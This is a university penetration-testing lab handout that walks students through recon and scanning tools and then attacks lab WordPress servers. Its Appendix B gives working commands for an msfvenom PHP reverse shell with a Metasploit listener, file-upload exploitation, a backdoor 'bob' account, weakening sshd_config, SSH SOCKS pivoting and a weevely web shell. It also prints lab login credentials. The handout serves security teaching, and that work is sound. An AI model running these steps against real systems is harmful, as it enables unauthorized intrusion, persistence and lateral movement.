Penetration Testing Lab

Note: ​This lab is the same Penetration Testing Lab for ELM course CST630. Therefore, CST630 is
referenced in several places. Functionally, this will not matter and you should be able to follow the
directions as written here to perform the lab. Also note that the screenshots in this document are for
illustration purposed and were produced in a different environment before the lab environment you are
using was created. So your screen output may not be identical. 
 
Deliverables:  
1. Penetration Testing Report. See directions below.
2. Penetration Testing Lab Exercise Report. Document your lab experience, how you
collected and recorded findings, and include responses to the questions in various parts
of the lab exercise. Make sure you lab report is neatly organized with all the phases of
the penetration testing process. Include appropriate screenshots within your Lab Report.

Directions:​ Review ​Appendix A​ to gain an understanding of the tools used within a penetration
test (pentest), and then complete all the steps in Appendix B. Within ​Appendix B​, you will be
using Kali Linux to gain an understanding of the network and to launch attacks against the
network. Based on the steps you perform within Appendix B, you will need to capture evidence
and write a ​Penetration Testing Report ​(review the reference titled ​Pentest Report​ on how to
write this report). You will address this report to your organizational leadership and discuss
information about the network, discuss the vulnerabilities you found, and provide your
recommendation to fix the problems. Since the lab is within a closed network (meaning no direct
connection to the Internet), you will also need to answer the ​questions within Appendix A​.

Before starting this lab, review ​Lab Resources​ and ​Lab References​.

1. Goal of the Lab Exercise

After the lab exercises, you should be able to attack a network and write a penetration testing
report. ​You will be required to use some of the tools found on Kali Linux within the
Workspace.​ To access Workspace, use the UMUC DigitalLabs.pdf. You will use NIXATK01
found within the lab broker.

2. Introduction to Hacking Tools

In other courses, you have learned how to use Nessus and Nmap. Within this lab, you will learn
to use a set of tools used by pentesters and hackers to learn about systems and to attack these
systems. The lab has two appendices. Appendix A introduces you to several tools. Appendix B
walks you through using these tools to conduct a full scope penetration test (or attack) on a lab
network.
Lab Resources

● Within this lab, you will use the following systems:

○ NIXATK01 (Kali)
■ Username: StudentFirst
■ Password: Cyb3rl@b
○ NIXTGT01 (CentOS) (Web Server 1) www.acme.com
○ NIXTGT02 (CentOS) (Web Server 2) www.hr.acme.com
○ WINTGT01 (Windows)

● Lab hot links

These hot links will quickly take you to the linked section of this document.

● Appendix A​ - Pentesting Tools

○ Nonattack Tools
○ Phase 1 Reconnaissance
■ Questions
○ Phase 2 Scanning
○ Phase 3 Attack and Gaining Access
○ Phases 4 & 5- Maintaining Access and Covering Tracks
● Appendix B​ - Attacking the Network (this is the actual lab exercise)
○ Part 1
○ Part 2
○ Part 3
○ Part 4
○ Part 5
○ Part 6
○ Part 7
○ Part 8
○ Part 9
○ Part 10
○ Part 11
○ Part 12
○ Part 13
○ Part 14
○ Part 15
○ Part 16
○ Part 17

Lab Reference Information

Metasploit Tutorial
 ● https://www.youtube.com/watch?v=cnkLv_RE3EI
https://www.youtube.com/watch?v=TCPyoWHy4eA

Msfvenom Tutorial
● https://www.youtube.com/watch?v=CtVH0MCv3DI
● https://www.youtube.com/watch?v=ugHJMnI_C_E

Pentest Report
● http://www.pentest-standard.org/index.php/Reporting

Weevely
● https://github.com/epinna/weevely3/wiki/Install-and-first-run
 Appendix A: Pentesting Tools
In this appendix, you will learn the different phases of attacking a system. You will also gain an
understanding of each tool used in these phases so that you can complete the lab in ​Appendix
B​.

To learn the tools within this lab, you will use Kali Linux. Use the following information to log in
to the system:
○ NIXATK01 (Kali)
■ Username: StudentFirst
■ Password: Cyb3rl@b
 
Nonattack Tools

As a penetration tester, you will be required to hunt, gather, and analyze data. Keeping accurate
records of your data collection will be the most challenging, yet critical, aspect of your
penetrating test process. ​KeepNote​ is a very useful tool to help you overcome this challenge.
KeepNote allows you to collect data for later use. It allows you to create folders, documents,
and to capture screens within the tool. Below is an example of KeepNote:

Source: KeepNote

Within KeepNote, you will see two different rows along the top of the screen. Click on File. The
first row is similar to what you might see in other graphical applications. The second row is
similar to other common word processing applications. The first two buttons below “File” are

“Create a new folder” and “Create a new page” . You will need to start by creating a new
notebook. To do this click on File and then create new notebook. The new notebook window will
open. Give your notebook a name of CST630 Demo, then double click Desktop, and click on
new. In the example image above, you see a folder called CST 630 Demo. In this folder, you
would want to make a page for taking notes during the reconnaissance phase of a test. You can
name this page ​recon​.
Source: KeepNote

Within the CST 630 Demo folder, make a new folder for each system that you find. Make a
folder called ​System 1​.

--------------
Note:​ Create a different page for each scan type, exploit, and other areas of interest. An
example would be NMAP, WPScan, DIRB, Exploit (Type of Exploit, XSS).
--------------

Source: KeepNote

Under the System 1 folder, make a page called Scan data.

Take a screenshot that looks like the below image:

Source: KeepNote

KeepNote is the single most important tool you will use during a penetration test. This tool will
help you keep track of all of your findings, exploits, and other data that will help you write a
penetration testing report.
 
Phase 1: Reconnaissance

During this phase, use only the Workspace system. You will not use any virtual machines.

The first phase of a test is the reconnaissance. This phase is used to find everything you can
learn about the target. Normally you will use Google and other search engines to learn about
the target. In addition to search engines, you should also use Internet tools such as ​whois​ or
other similar tools to look up domains and to collect information. You must catalog all the
information you collect. The next section will show you examples of information collection.

Google
There are many ways to look for information about a company. This can be completed with the
use of search engines such as Google, Bing, or Yahoo. Each of these search engines has
advanced search options that can be used to search for files, words, and other details about a
target company. For this exercise, you will use Google and its advanced search options. Follow
the steps below to collect information about UMUC.

Step-by-Step Instructions

You will start with a basic search for a specific site. This is completed with the search term of
“site:” with the website followed. The following shows a search that targets UMUC.edu. For
example, in Google, type

site:umuc.edu

Then, take a screenshot of the page:

Source: Google in Firefox browser

2. The next search operation will look for any text that is found within the URL of a website. This
search operator is performed with adding “inurl:” to the search string. For this search, you will
look for all pages that contain cybersecurity within the URL. For example, in Google, type

site:umuc.edu inurl:cybersecurity

Then, take a screenshot of the page:

Source: Google in Firefox browser

3. The next search will look for the file types that can be found on a web server. This search is
done with the use of the command “filetype:” followed by the file type. For example, in Google,
type

site:umuc.edu filetype:pdf

Then, take a screenshot of the page:

Source: Google in Firefox browser

4. The next search will look for text that is found on a web page. This search is done with the
command of “intext:” followed by the text to search for. For example, in Google, type

site:umuc.edu intext:cyber security

Then, take a screenshot of the page:

Source: Google in Firefox browser

5. Outside of using these high-level search commands, you can also combine the advanced
searches. Next, you will combine the use of “intext” and “filetype.” For example, in Google, type

site:umuc.edu filetype:pdf intext:cyber security

Then, take a screenshot of the page:

Source: Google in Firefox browser

Questions

Follow the above steps to complete the following questions.

1. Perform three advanced searches, explain what you were searching for, and then take a
screenshot of each search.
2. For each of the searches, why did the results change? How can you combine the searches to
get less results?
3. How can this be used by both black and white hat hackers?
4. What type of information would you look for when performing information gathering?
5. What is the difference between active ​reconnaissance​ ​and passive ​reconnaissance​?
6. Research two other search engines and provide the details to conduct the same type of
information gathering. Provide the search, what you searched for, and a screenshot.
7. You were conducting information gathering of a company website; however, no search
engine provided any details. After reviewing the website, you saw an e-mail address with a
different domain that the website. How can this be used?
 
Phase 2: Scanning

The second phase of an attack is scanning. This is when you will use dirb, Nmap, Nikto, and
other scanners to collect additional information. This section will help you to identify IP
addresses, ports, operating systems, plug-ins, and other details.

dirb

The first tool in your arsenal is dirb. This tool is used to identify both known and unknown
directories of a website. The tool uses a file called a wordlist to perform webrequest to a website
to identify the directories. Dirb is used by both black and white hat hackers.
 
With dirb and other tools to better understand the flags and arguments, you should always start
by looking at the help information. To view the dirb help information, enter “dirb” into the
terminal. The tool will provide the contents of the help file. Review the help content and make
notes of the output.

The dirb help is broken down into four different sections: Notes, Hotkeys, Options, and
Examples. Notes refers to the content above the notes. This explains how to provide the
commands to dirb. Hotkeys are used to perform different actions during a scan. Options are
used to tell dirb to try different options during a scan. Example provides an example of how to
write the commands. The following image shows the command which was used to view the help
information and a small sample of the output:
Source: Dirb in terminal
Before running any scans, start by explaining the different flags or options within the dirb help.

-a option
The first option on the list is -a This is used to change the user agent string. The user agent
string is a set of data that tells the server what type of system requested the information.
Depending on the browser you use, you may see different user agent strings. However, the
point of this option is to mask the use of dirb and to make it appear as a browser requested the
content.

-c
The next option on the list is the cookie string. The cookie string can be used for a few reasons.
The information could have been collected with the use of cross-site scripting, or provided by
the client.

-i
The next option is case insensitivity. This option tells dirb to try more requests based on
possible character case. For example, if your wordlist is only in lowercase, the scan may not
return a result for uppercase letters. The same can be said about the other way around.
-r and -R
The next set of options is recursive scans. The -r option is used to tell dirb to not scan or rather
enter new directories. However, -R tells dirb to scan the new directories but to ask before
entering new directories.

-X
The last option we will review is the -X option. This option is used to define extensions to also
add to the scan. What happens is that dirb will take the wordlist and add the extensions to the
end of those words.

The dirb help shows four different parts needed for the command to execute. The first part, dirb,
is the text used to start dirb. The next part, <url_base>, is the URL that is being directory
brute-forced. The next part is the wordlist to use for the scan. For the wordlist option to work,
you need to provide the directory location of the wordlist file. The options were explained earlier.

Source: Dirb in terminal

With dirb, you can also run default scans. The default scans revert to a default setting, which
tells dirb to use a common wordlist and to automatically enter new directories. The basic or
default scan is provided to dirb within the use or wordlist or other options. The basic option is
the one mostly used within the dirb scans. The following is an example of the command:

_______
Note​: Site_to_test.com is not a real website; you need to change this with any other website
you are testing against.
_______

dirb http://site_to_test.com​.

Nikto
Nikto is a web application vulnerability scanner. This scanner is used to identify vulnerabilities of
websites, and web applications. This tool, like dirb, has its own set of flags and can be reviewed
by providing the -help flag. The next image shows the full list of the help commands:
Source: Nikto in terminal

Like dirb, these flags are used by Nikto to perform different function. However, the main
difference when you review the help content of Nikto are the flags that contain a plus symbol.
These plus symbols designate additional values needed for each flag. We will now review each
of the flags.

-Display+ - This flag allows to define the following options:

1 - Show redirects: This option tells Nikto to show when the web server has a redirect to
some other location.
2 - Show cookies received: This option tells Nikto to show the cookies used by the web
server.
3 - Show all 200/OK responses: This option tells Nikto to show all 200 response codes
from the web server.
4 - Show URLs which require authentication: This option tells Nikto to show all URLs that
contain an authentication for the web server.
D - Debug Output: This option shows the data that is sent to the web server.
E - Display all HTTP errors: This option shows all HTTP-based error messages and
codes.
P - Print progress to STDOUT: This option shows the status while Nikto is running the
scan.
V - Verbose Output: This option shows or lists everything that Nikto is doing while it is
scanning the web server.
To add this option, you would type this within the terminal:

nikto -h 10.0.0.0 -Display [value]

-Format+ - This option tells Nikto which file format to use during the output of the results.

nikto -h 10.0.0.0 -Format txt

-Help - Shows the help file for Nikto.

-host - The target system to scan. This can be listed as a IP address or hostname.

-root+ - this option tells Nikto to start scanning at the defined directory.

To learn more about the options, you can review the following link:

https://cirt.net/nikto2-docs/options.html

The following command shows you how to run a Nikto scan.

nikto -h 10.0.250.200

While Nikto is running, you will see the following within the terminal:

Source: Nikto in terminal

The output you will see in the terminal has two main parts. The first part of the output is placed
within a dash type of box. The information within the box shows the details about the target. The
second part shows the output of the scan results. The scan results section shows information
such as server, plug-ins, and OSVDB.

Source: Nikto in terminal

 
WPScan
 
The next tool you will examine is WPScan. This tool is used for scanning WordPress websites.
The tool is rather easy to use but also has its own set of switches. The tool is

Wpscan --url ​http://ipaddress

Source: WPScan in terminal

 
 
Nmap

How to use Nmap

The usage syntax of Nmap is fairly simple. Options to ‘nmap’ on the command-line are different
types of scans that are specified with the -s flag. A ping scan, for example, is "-sP". Options are
then specified, followed by the hosts or networks to be targeted.

Nmap is flexible in specifying targets. Simply scan one host or scan entire networks by pointing
Nmap to the network address with a "/mask" appended to it. In addition, Nmap will allow you to
specify networks with wild cards, such as 192.168.100.*, which is the same as
192.168.100.0/24. Or in our case, we can indicate the range of target hosts as follows:

192.168.100.103-106

Which hosts are up now? Ping Sweeping

Intruders can sweep entire networks to locate targets with Nmap. This is usually done with a
ping scan by using the "-sP" flag. By default, Nmap will send an ICMP echo and a TCP ACK to
each host it scans. Hosts that respond to either will be considered by Nmap to be up. In this
example, you could scan all hosts on the 192.168.100.0 network​.

#​ sudo nmap -sP 192.168.100.*​

(Both Zenmap and the command-line will allow you to enter this command and run the scan, but
Zenmap, due to a software glitch, will change the displayed command-line in the output area to
“nmap -sn 192.168.100.*”; if you run the command in Zenmap, just ignore the display glitch and
note the results.)

Sometimes you may merely want to check the availability of a system without sending ICMP
echo requests, which may be blocked by some sites. In this case, a TCP "ping" sweep can be
used to scan a target's network. A TCP "ping" will send an ACK to each machine on a target
network. Machines that are up should respond with a TCP RST. To use the TCP "ping" option
with a ping scan, include the "-PT" flag to target a specific port on the network you're probing. In
our example, we'll use port 80 (http), which is the default, and it will probably be allowed through
the target's border routers and possibly even its firewall. ​Note that the targeted port does not
need to be open on the hosts that are being probed to determine if the machine is up or
not.​ Launch this type of scan as follows:

# sudo nmap -sP -PT80 192.168.100.*

When a potential intruder knows which machines on the target's network are alive, typically the
next step is port scanning.
Any (vulnerable) services available? Port Scanning
Different types of port scans are provided by Nmap: TCP connect, TCP SYN, Stealth FIN, Xmas
Tree, and Null, as well as UDP scans.

TCP connect

When an attacker is using TCP connect scans, Nmap will use the connect() system call to open
connections to interesting ports on the target host and complete the three-way TCP handshake.
The probe is easily detected by the target host. Logs on the host machine will show these ports
being opened by the attacker. A TCP connect scan is used with the "-sT" flag as:

# sudo nmap -sT 192.168.100.103-106

Stealth Scanning

What if an attacker wants to scan a host without being logged on the target machine? TCP SYN
scans are less prone to logging on the target's machine, because a full handshake never
completes. A SYN scan starts by sending a SYN packet, which is the first packet in TCP
negotiation. Any open ports will respond with a SYN|ACK, as they should. However, the attacker
sends a RST instead of an ACK, which terminates the connection. The advantage is that the
three-way handshake never completes, and fewer sites will log this type of probe. Ports that are
closed will respond to the initial SYN with a RST, allowing Nmap to determine that the host isn't
listening on that port. ​This command might require root privileges, which could be
obtained by trying "sudo" command at the knoppix prompt.​ The "-sS" flag will launch a
SYN scan against a host or network as:

# sudo nmap -sS 192.168.100.103-106

Although SYN scans are more likely to be unnoticed, they can still be detected by some
intrusion detection countermeasures. The Stealth FIN, Xmas Tree, and Null scans are used to
evade packet filters and firewalls that may be watching for SYN packets directed toward
restricted ports. These three scans should return a RST for closed ports, whereas open ports
should drop the packet. A FIN "-sF" scan will send a FIN packet to each port, whereas the Xmas
Tree scan "-sX" turns on the FIN, URG, and PUSH flags, and a Null scan "-sN" turns off all
flags. ​Because of Microsoft's noncompliance with TCP standards, the FIN, Xmas Tree,
and Null scans are only effective on non-Microsoft operating systems.
UDP Scanning

Using the UDP scan "-sU", an attacker can determine what ports are open to UDP on a host.
Nmap will send a 0-byte UDP packet to each port. If the host returns a "port unreachable"
message, that port is considered closed. This method can be time-consuming because most
UNIX hosts limit the rate of ICMP errors. Fortunately, Nmap detects this rate and slows itself
down, so not to overflow the target with messages that would have been ignored. Launch a
UDP scan as follows:

# sudo nmap -sU 192.168.100.103, 192.168.100.105, 192.168.100.106​

Which OS is running on the host? OS Fingerprinting

Often, an intruder may be more familiar with exploits for a particular operating system and may
be looking for machines to compromise easily. A common option is TCP/IP fingerprinting with
the ​"-O" option​ to determine the remote operating system. ​This has to be combined with a
port scan and not a ping scan.​ Nmap accomplishes this by sending different types of probes
to the host, which will narrow the target operating system. Fingerprinting the TCP stack includes
such techniques as FIN probing to see what kind of response the target has, BOGUS flag
probing to see the remote host's reaction to undefined flags sent with a SYN packet, TCP Initial
Sequence Number (ISN) sampling to find patterns of ISN numbers, as well as other methods of
determining the remote operating system.

# sudo nmap -sS -O 192.168.100.103-106​

The TCP Sequence Prediction tells us how difficult TCP sequence number prediction is for the
remote host. This is valuable to an attacker looking for hosts that can be vulnerable to session
hijacking.

Other Options

-P0​ Do not try to ping hosts at all before scanning them. Since Nmap will ping a target with
both TCP "ping" and ICMP echo before attempting a port scan, sites blocking ICMP and TCP
probes will not be scanned by default.

"-v"​ This is verbose option that can be used with all types of scans. You can use this flag once,
even twice​, to get more information about the target's machine.

The ability to target specific ports is accomplished with the ​"-p "​ option. For instance, if an
attacker wanted to probe your web server for ftp (port 21), telnet (port 23), name service (port
53), and http (port 80), and wanted to know the OS you were using, he/she may try the SYN
scan:
 # sudo nmap -sS -p 21,23,53,80 -O -v 192.168.100.103

“-iR”​ Use this command to instruct nmap to scan random hosts.

For a complete list of the options for Nmap, you can see the manual of the NMAP at
http://www.insecure.org/nmap​.

Quick Start of Nmap

Here are some examples of NMap commands to do specific scans:

Ping Sweeping
Icmp ping ​ ​ # sudo nmap -sP “host IP address”
tcp ping # sudo nmap -sP -PT80 “host IP address”

Port Scanning
TCP connect # sudo nmap -sT “host IP address”
Stealth scanning # sudo nmap -sS “host IP address”
UDP scanning # sudo nmap -sU “host IP address”
Stealth FIN # sudo nmap -sF “host IP address”
Xmas Tree # sudo nmap -sX “host IP address”
Null scan # sudo nmap -sN “host IP address”

OS Fingerprinting​ # sudo nmap -sS -O “host IP address”

Remember that all of the information collected within this phase needs to be stored. The first
two phases of an attack changes how you will attack the network. After you collect the
information, you will then turn to the Internet for searching for possible exploits. You will look at
different software, people, tools, and other data that would help you with identify how to attack
the network.

Before the next phase begins, you will also develop an attack scenario. The attack scenario will
then be used within an offline test. This offline test would be conducted on a network or other
systems which is close to what you understand the network to be. This round of testing is
completed to ensure that the tests that you perform will not cause a denial of service. Outside of
the government, downed systems could cost your company and client income.

Burp Suite
 
Burp Suite is a unique tool which can be used within many different areas of an attack. The tool
allows for scanning, crawling, and proxying requests. There are two different versions of Burp
Suite: paid and free. The free version does not have a scanning tool, whereas the paid version
does. The below image shows the Burp Suite running:

Source: Burp Suite

Along the top of the screen, you will see 12 different selections, or parts of the tool. Those are
Target, Proxy, Spider, Scanner, Intruder, Repeater, Decoder, Comparer, Extender, Options, and
Alerts.

Click on ​Target​. Under Target, you have two more buttons: Site Map and Scope. Site Map
shows you the site map of hosts that Burp Suite saw traffic for. Scope allows you to define
which systems are in or out of scope.

Click on ​Proxy​. The proxy part of Burp Suite allows you to capture traffic as it is leaving your
host and modify the traffic as it is going to the server. To use this part of Burp Suite, set your
browser to use Burp Suite as a proxy.

You can review the other parts of Burp Suite as you like.
Phase 3: Attack and Gaining Access
The attack phase of the test is where you use what you learned about the network to gain
access to the systems and network. Some of the tools used within this phase are Metasploit and
MSFVenom. Metasploit has a wide range of use. MSFVenom, on the other hand, is used for
building payloads for exploiting a system.

You can watch the videos within the references to learn more about both tools.

Phases 4 & 5: Maintaining Access and Covering Tracks

 
The last two phases of an attack are Maintaining Access and Covering Tracks. Research both
 
of these and write a paragraph explaining what happens within both of those phases.
 
 
   
 Appendix B: Attacking the Network
(this is the actual lab)
 
After gaining an understanding of the tools and techniques introduced to you in Appendix A, you
will now use these tools and techniques to perform the lab. There are 17 parts to the lab.
Complete each part carefully to complete the entire lab exercise. Some parts have questions
that you will need to respond to. Always take screenshots of important findings to complete the
report and to document your lab experience.

Log in to Kali Linux with the following information:

○ NIXATK01 (Kali)
■ Username: StudentFirst
■ Password: Cyb3rl@b

Part 1
Due to the network not being crawled by the search engines, you will conduct active recon of
the network. To do this, you will use a tool called HTTrack to clone the website to our attack
machine. Before you clone the website, create a new folder.

On the desktop, right-click and select “​create folder”​. Name the folder ​websites_clone​. The
desktop should look like the following image.

Source: Kali desktop

Next, you will need to open a terminal.

--------------
Note:​ To open a terminal, you can open it from two different locations. The first location is at the
bottom of the screen within the dock . The other is from the Application button at the top left
of the screen. The icon looks the same as found within the dock .
--------------

Click on the terminal icon to open a new terminal session. Change the current directory from
/home/StudentFirst to /home/StudentFirst/Desktop/website_clone. You need to do this so that
the website is copied into the folder you created. To do this, enter the following command:

cd /home/StudentFirst/Desktop/website_clone

Source: Terminal

You will run the HTTrack to clone the website.

sudo httrack ​http://www.acme.com

--------------
Note:​ When you supply the sudo command, you will see the following error message. Do not be
alarmed; this is normal within this environment.

Source: Terminal
--------------

You will start to see a lot of running in the terminal. See the figure below:
Source: HTTrack in terminal

After HTTrack has completed, go to the folder that you created and open the ​index.html​ file.
You will see a website that says that you have gone to the wrong location. This means that the
website uses a different directory for the home directory.

Source: HTML made for lab in Firefox

Next, open the browser and go to the website. You should see the same page that you copied.
​ iew page source​. Review
Now that the website is open, right-click on the webpage and select V
the page and look for any comments on the page.

Take a screenshot.

Part 2
The next phase is the scanning phase, which means that you will now be actively conducting
requests to the website. The first thing you will do is scan the website with Nmap. Based on
what you learned from the nmap scan of the web server, answer the following questions:

sudo nmap -v -sSV -p 1-1024 ​www.acme.com

Source: Nmap in terminal

 ● What ports are listening?
● What services did NMap identify?
● Anything else of value?

Source: Nmap in terminal

Include your answers in the final report.

Part 3
Next, you need to identify the directories of the website. Use dirb to scan the website.

Within the terminal, type the following command:

sudo dirb ​http://www.acme.com

You will see something like this within the terminal.

Source: Dirb in terminal

Now that dirb has identified the directories, you will begin to use other tools.

Answer the following question:

Within your report, identify all of the directories and files that dirb found?

Include your answer in the final report.

Source: Dirb in terminal

Part 4
You will start by scanning with Nikto.
Within the terminal window, type the following command:

sudo nikto -h http://www.acme.com/wordpress

Source: Nikto in terminal

After the Nikto scan has completed, answer the following questions:

1. Compare the ports found within the nmap scan, do you see anything different?
2. What are the cookies found on the website?
3. Select three different OSVDB found within the scan. Do a Google search for the three
that you selected. Explain any information that you found about those OSVDBs.
4. Does Nikto show or list plugins used by the web server?
5. What is WordPress used for?

Include your answers in the final report.

Part 5
Now that you know that the web server is differently running WordPress, you will now scan the
web server with WPScan.

Run the following command:

sudo wpscan -u http://www.acme.com/wordpress

WPScan will ask you if you want to update the scanner. Type N for no and hit Enter. You will
then see the following information.
Source: WPScan in terminal

When WPScan is completed, review the information. Each information item begins with red,
yellow, or green plus signs. Red plus signs mean that the web server is vulnerable to
something. Review the details of each item and answer the following questions:

1. How many alerts and vulnerabilities are there?

2. What is the total number of red, yellow, and green items?
3. Do you see any vulnerabilities that have a remote code execution or arbitrary file
upload. Are there any other red alerts?
4. What is a remote code execution (RCE), and arbitrary file upload?
5. Select the vulnerability that has the highest risk and explain how it is exploited.

Include your answers in the final report.

Part 6
Now that you have identified the vulnerabilities, we can begin to attack the network. Since
WordPress has an arbitrary file upload vulnerability, you will need to create a shell used for
calling back to the attacking system. You will create a listener, upload the shell, and run the
shell. Within the next section, you will learn how to exploit a web server.

To make the shell, you will use msfvenom for creating the file you need to be uploaded to the
web server. On the attacking machine, you will open a new terminal. Within the terminal, you will
type the following command:
 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.101 LPORT=80 -e
php/base64 -f raw > /home/StudentFirst/Desktop/msfvenom.php

When the command is completed, you will see the following output:

Source: Msfvenom in terminal

The next thing to do is open the file to add php open and close. Go to the desktop and open the
msfvenom.php file by right clicking on the file and selecting leafpad. When you open the file, it
will look like unreadable code. You will need to type ​<?php​ at the beginning and ​?>​ at the end
of the file. The file should look like the following image:

Source: Leafpad

Now, open the “Download CST630 Project Resource” file found under Lab Resources and
Projects, which is located on the desktop. Under project 1 click on WP Exploit [www.acme.com].
When the web page is open you will see the following web page.

Source: Firefox browser

Now, you need to upload the file to the web server. Click on the “Browse..” button and select the
msfvenom.php file. After the file is selected, you will need to click on the “upload!” button.
Source: Firefox browser

When the file is uploaded, you will see ​{"success":true,"fileName":"\/\/\/msfvenomtest.php"}

on the web page. This means that the file was uploaded to the web server.

Source: WordPress in Firefox browser

After the file is uploaded, make sure you can see it within the directory listing on the web server.
The dirb scan showed a listing of the upload directory. Go to the upload directory on the web
server. Once you reach the upload directory, take a screenshot showing that you found the
location of the file. You should see the following.

Source: WordPress in Firefox

Part 7
Now, you need to set up the listener on the attack machine. Open a terminal window and type
the following command to open Metasploit:
sudo msfconsole

Wait for Metasploit to complete the load process. When it is completed, you will see the
following window:

Source: Metasploit in terminal

When it completes the loading process, you will need to enter the following commands:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.10.101
set lport 80
exploit

You will see the following in the terminal window. This will let you know that the listener has
been created and Metasploit is waiting for the session.
Source: Metasploit in terminal

Now go to the upload directory and click on the php file that you uploaded. After you click on the
php file, you should get the call back to your Metasploit terminal session. You will see the
following in the terminal window.

Source: Metasploit in terminal

You will know that you have a call back when you see “Meterpreter session 1 opened”. Now that
you have the call back, you want to run a few tests to s

ee what level of access you have. You will need to drop into a shell to run some checks. In the
Meterpreter terminal window, type the following:

shell

This will drop your current session down into a shell session.
Source: Metasploit in terminal

Now, you need to check your current role. To do this, you will need to run the “who am i”
command. To do this, type in the terminal

whoami

The output will show you the current role.

Source: Metasploit in terminal

Part 8
Now that you have access to the system, you need to make a new user account to maintain
access. You will now make a user named ​bob​ and set the password to ​bob​. In the current
session window, type ​sudo adduser bob​ and then hit Enter. This will create the user bob. Now,
set the password for the user type ​sudo passwd bob​ and then type ​bob​ two times. You will
see the following when you are done.
Source: Terminal

Now that you have a current user on the system, you will use that system to pivot to the next
part of the network. The term pivoting is used when describing the act of leapfrogging from host
to another host. Hackers use pivoting to gain access to network segments when normal access
is not allowed. To do this, you will use SSH to create a socks connection to the web server.
Open a new terminal window and type the following:

sudo ssh -D 3434 bob@192.168.10.111

Source: Terminal

As you can see, the SSH session failed due to a permission denial of no recognized certificates.
To bypass this requirement, you will download a copy of the sshd_config file to use SSH.
Sometimes hackers modify configuration to gain access to other parts of a system or systems.

Part 9

Now, go back to the terminal window with the Meterpreter session to the first web server. Now
we will use Meterpreter to download a copy of the sshd_config file. Within the Meterpreter
session, type the following.

exit

This will take you out of the shell session and back into the meterpreter session. The screen
should look like the following:
Source: Metasploit in terminal

Now, within Meterpreter, you will download a copy of the sshd_config. Within the Meterpreter
session, type the following:

download /etc/ssh/sshd_config /home/StudentFirst/Desktop/sshd_config

The Meterpreter session will tell you that it is downloading the file and then the file is
downloaded.

Source: Metasploit in terminal

After the Meterpreter session tells you that the file was downloaded, you should also see the file
on your desktop.
Source: Kali desktop

Now, right-click and select rename, and change the name to sshd_configOld. Then right-click on
the sshd_config file and then select “Open with Leafpad.”
Source: Kali desktop

Look in the file for “#PasswordAuthentication Yes” and remove the “#”. Then, look for the
“PasswordAuthentication No” and add the “#”. The use of “#” is used as an ignore point of the
configuration file. This is done to turn on or off parts of the configuration file.
Source: Leafpad

Now look for “UsePam Yes” and change “Yes” to “No”. The line should look like “UsePam No”.
After the three changes have been made, save the file as “sshd_config”.

Source: Leafpad

Then, go back to the Meterpreter session terminal and type the following command to upload
the file back to the web server. You will upload the file to the tmp directory. This is done to allow
you to move the file from the tmp directory over the top of the old sshd_config file.

upload /home/StudentFirst/Desktop/sshd_config /tmp/sshd_config

Source: Metasploit in terminal

Now, we need to drop back into a shell within the Meterpreter session. Type the following
command:

shell

Source: Metasploit in terminal

Now, you need to move the file over to the right location and then stop and then start the sshd
service. Enter the following command:

sudo cp /tmp/sshd_config /etc/ssh/sshd_config

Source: Metasploit in terminal

Next, you need to start and stop the SSH service. This is done to force the new configuration.
Type the following commands:

sudo service sshd stop

sudo service sshd start

Source: Metasploit in terminal

Now, enter the following command to create the socks proxy.

sudo ssh -D 3434 bob@192.168.10.111

When you are prompted, enter the password for the StudentFirst and the password for bob of
“bob”. You will see the following before you type the password. After the session is created, you
will see the windows look as follows. Unlike in the first attempt, now that the configuration has
been changed and forced to be accepted, you will have the SSH connection.

Source: Terminal
Part 10
You will now run dirb scans through the first web server to the second web server. You will do
this by taking the SSH session you just created and piping the following commands through that
session. Open a new terminal window and type the following in the terminal:

sudo dirb http://hr.acme.com/ -p socks5://127.0.0.1:3434

You will see the output look like the first dirb scan.

Source: Dirb in terminal

Part 11
You have now identified that the internal web server is also WordPress. Within the terminal, now
type the following command:

sudo wpscan -u http://hr.acme.com/wordpress --proxy socks5://127.0.0.1:3434

You will see the following in the terminal window:

Source: WPScan in terminal

Answer the following questions:

1. How many alerts and vulnerabilities are there?

2. What is the total number of red, yellow, and green items?
3. Do you see any vulnerabilities that have a remote code execution or arbitrary file
upload. Are there any other red alerts?

Include your answer in the final report.

Part 12

Now that you know that the first system contains the same vulnerable plug-in, you will use a
similar attack to gain access to the internal web server. Minimize all of the windows and open
Burp Suite. You will use Burp Suite to proxy your web session to the socks proxy, and then to
the web server. The icon for Burp Suite is found under the “Applications” and then “Web
Application Analysis” and looks like this image . After Burp Suite is open, open the web
browser. You will need to go into the setting of the browser to make some configuration
changes. After the browser is open, click on the icon that looks like this in the top right of

the screen. Then click on preferences button the button looks like this . Then click on the
advanced button on the left side of the screen. The button looks like this . Then
click on Network and then settings. The last window should look like this:

Source: Firefox browser connection settings

Select Manual proxy configuration. The window should look like the window below. Then click
OK.
Source: Firefox browser connection settings

Now go back to Burp Suite and click on “User Option”. You will see a section that says Socks
Proxy. Within the details of the Socks Proxy, fill it out so it looks like the below image:
Source: Burp Suite

Within Burp Suite, you will also need to disable the packet interception. You will do this by going
to the Proxy tab, and clicking on .

Part 13
Now, you will use the first web server to force connection based on the next exploit. Open a new
terminal and type the following command.

sudo vi /etc/proxychains.conf

Scroll to the bottom of the screen and then type the following:

socks5 127.0.0.1 3434

Before you continue, you will also need to remove the following entry:

socks4 127.0.0.1 9050

Source: ProxyChains terminal

Then hit the Escape key, and type ​:wq​ and hit Enter.

Part 14
Now that the ProxyChain is set, we will build a new payload. Use the terminal window you used
to modify the socksproxy configuration file. The tool you will use next is not Metaspolit; it is
called Weevely. This tool is unique from Metasploit because you add a layer of security for your
exploit by adding a password to the payload you will upload. Then type the following command.

sudo weevely generate pass /home/StudentFirst/Desktop/wee.php

This will generate a new payload called “wee.php” on the desktop of the Kali system.

Source: Weevely in terminal

Now, open the “Download CST630 Project Resource” file found under Lab Resources and
Projects, which is located on the desktop. This file creates a web page that allows you to upload
a file to the web server. Double-click on the “Download CST630 Project Resource.desktop”, and
then select “launch anyway”. When the browser is open, you will see the following web page:
Source: Firefox browser

Now, we need to upload the file to the web server. Click on the “Browse..” button and select the
wee.php file. After the file is selected, you will need to click on the “upload!” button. When the
file is uploaded, you will see “{"success":true,"fileName":"\/\/\/wee.php"}” on the web page. This
means that the file was uploaded to the web server.

Source: Firefox browser

After the file is uploaded, make sure you can see it is within the directory listing on the web
server. The dirb scan showed a listing of the upload directory. Go to the upload directory on the
web server. Once you are at the upload directory, take a screenshot showing that you found the
location of the file. You should see the following.

Source: Firefox browser

